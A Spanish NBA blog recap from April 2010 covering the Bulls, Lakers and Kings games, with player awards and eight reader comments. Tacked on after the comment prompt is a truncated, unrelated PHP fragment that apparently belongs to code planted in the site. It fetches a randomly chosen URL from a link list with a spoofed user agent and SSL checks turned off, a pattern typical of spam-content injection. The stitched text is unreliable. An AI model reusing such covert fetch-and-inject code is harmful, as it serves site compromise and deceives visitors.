La crónica (08/04/2010)

09 de April de 2010 por TheDeerHunter

Apenas un par de partidos destacables, pero con mucho para contar.

Los Bulls dieron un paso adelante en esa particular partida a la “gallinita ciega” con la que se están jugando la octava plaza del Este con los Raptors. Con Deng y Noah disponibles este equipo tiene otra cara. Ayer, como no puede ser de otra manera, fueron básicos junto a Rose y Hinrich. Un banquillo con Brad Miller, Hakim Warrick y Flip Murray rubrica un equipo de playoffs por nombres propios. Anoche, además, los Cavs les dieron “vidilla” no sacando a LeBron al ruedo y los Bulls lo aprovecharon. Ya no se afronta con el mismo estado de ánimo esa hipotética serie si se llega a ella con victoria previa, más si la lesión que sufrió anoche Jamison se complica o si Shaquille no llega tan a tiempo. Y por cierto, el clutch de anoche para los Cavs se lo jugó Varejao… por dos veces para ser exactos. Falló las dos.

Los Lakers tenían la oportunidad de cerrar anoche el primer puesto del Oeste. Era en Denver, plaza complicada y con Kobe reservándose. Como viene siendo habitual los amarillos sestearon en la primera parte y luego trataron de darle la vuelta a la tortilla en la segunda a base de defensa en estado puro. A punto estuvieron de lograrlo con Gasol de líder y Artest recordando su versión all-star. Curiosamente con dos equipos tan ofensivos fueron acciones defensivas las que decantaron la balanza, en concreto Melo le propinó un tapón para ganar a Fisher. Estuvo sensacional anoche el alero newyorkino.

Por último, sin trascendencia, los Kings apabullaron a los Clippers con una nueva actuación deslumbrante de su perla Tyreke Evans. Ya no le hace falta hacer muchas más de estas para asegurarse el rookie del año.

PREMIOS

MVP: Posiblemente Mo Williams o Pau Gasol consigueran actuaciones individuales más meritorias pero sus equipos no se alzaron con la victoria condición sine qua non para otorgar el galardón. En cambio, Tyreke Evans y sus 28 puntos, 6 rebotes y 7 asistencias, si que guiaron a los Kings a la victoria. Los 31 puntos de Carmelo Anthony también han de ser resaltados.

Rookie: Evidentemente el rookie del día es Tyreke, pero podemos destacar también a su compañero Omri Casspi, con 11 puntos y 4 rebotitos.

Sorpresa: No se prodiga Mo Williams en actuaciones como la que nos brindó anoche, conviertiéndose en el máximo anotador del partido. La razón posiblemente hay que buscarla en los pocos partidos que se pierde Lebron James.

Decepción: Sin Kobe, los 5 puntos que anotó anoche Lamar Odom se nos antojan ridículos. Hasta Vujacic anotó más que él.

Esfuerzo en vano: Mo Williams, 35 puntos y 10 asistencias. Pau Gasol, 26 puntos, 13 rebotes y 5 asistencias. Secundarios de lujo que sin embargo, no pudieron alzarse con la victoria.

Comenta

8 comentarios a esta entrada

  1. sayim dice:
    #1

    Varejao??? Dos?? Parece una broma…

    Dice Daimiel en su blog que en el partido de anoche Pau sólo recibió tres balones en ataque en los últimos 6 minutos. No parece un poco escaso siendo como es el mejor jugador de los que saltaron a la pista y el más acertado ayer. ¿La última bola ayer? Pick and roll entre Fisher y Odom?? No sería mejor con Pau? O Phil pretendía que fuera al rebote…

    A veces se me escapan las intenciones de los entrenadores…

      Citar

  2. CAMPO2 dice:
    #2

    Por lo que parece a Cleveland no le apetece ir hasta Toronto a jugar playoffs

      Citar

  3. sergio dice:
    #3

    Pues no es ninguna tonteria eso que dices CAMPO2…

      Citar

  4. LEmontus dice:
    #4

    Sayim yo ya dije lo que pesnaba de phil jackson para mi gusto no es que sea malo es que no hace nada, no da ordenes otra vez los paquetes con miles de tiros…. Vujacic 12tiros, brown 12, farmar 8… y por supuesto todos con malos porcentajes ahora claro kobe te mete un triple en el ultimo segundo para ganar un desatroso partido y ¿que pasa? que phill es el mejor… y claro si alguien le cuestiona, lo típico que si hagando muchos anillos…. Al final queda claro que ese tío ni papa… no se como pau no tiene mínimo 20-25 tiros si no está kobe.

      Citar

  5. CAMPO2 dice:
    #5

    Sergio lo acabo de mirar en el google maps y de diatancia esta mascerca toronto que chicago, pero aun asi creo que la liga prefiere que entr chicago que tiene mas nombre.

      Citar

  6. sergio dice:
    #6

    No se yo que le gustaria mas a Stern, si que disputara los Playoffs un equipo canadiense por aquello de la rivalidad o que entrara en juego el United Center de Chicago, que si no me equivoco es el estadio con mas afluencia de publico… Lo de la distancia suponia que no podia variar mucho porque estan en la misma division (salvo la Northwest no hay mucha diferencia entre divisiones) pero en cuanto a comodidad en el vuelo y estancia dudo menos de las infraestructuras de Chicago…

      Citar

  7. CAMPO2 dice:
    #7

    Teniendo en cuenta que una eliminatoria contra Toronto sin Bosh ni Turkoglu, seria aun mas descafeinada, mientras en Bulls esta Rose que es uno de ls mejores bases de su conferencia, Noah que con su look y su manera de jugar es un jugador mas omenos mediatico y que chicago creo que es la tercera ciudad de USA

      Citar

  8. LEmontus dice:
    #8

    noah es muchísimo más que un jugador mediático además de ser rapidísimo tanto en carrea como en movimientos ,ser muy intenso en defensa,un gran reboteador, buen taponador y lo más importante echarle un par de verdad, está aprendiendo poco a poco a atacar y tirar tiros libres un jugón y en breve si no lo está ya puede entrar en el top 10 de pivots.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>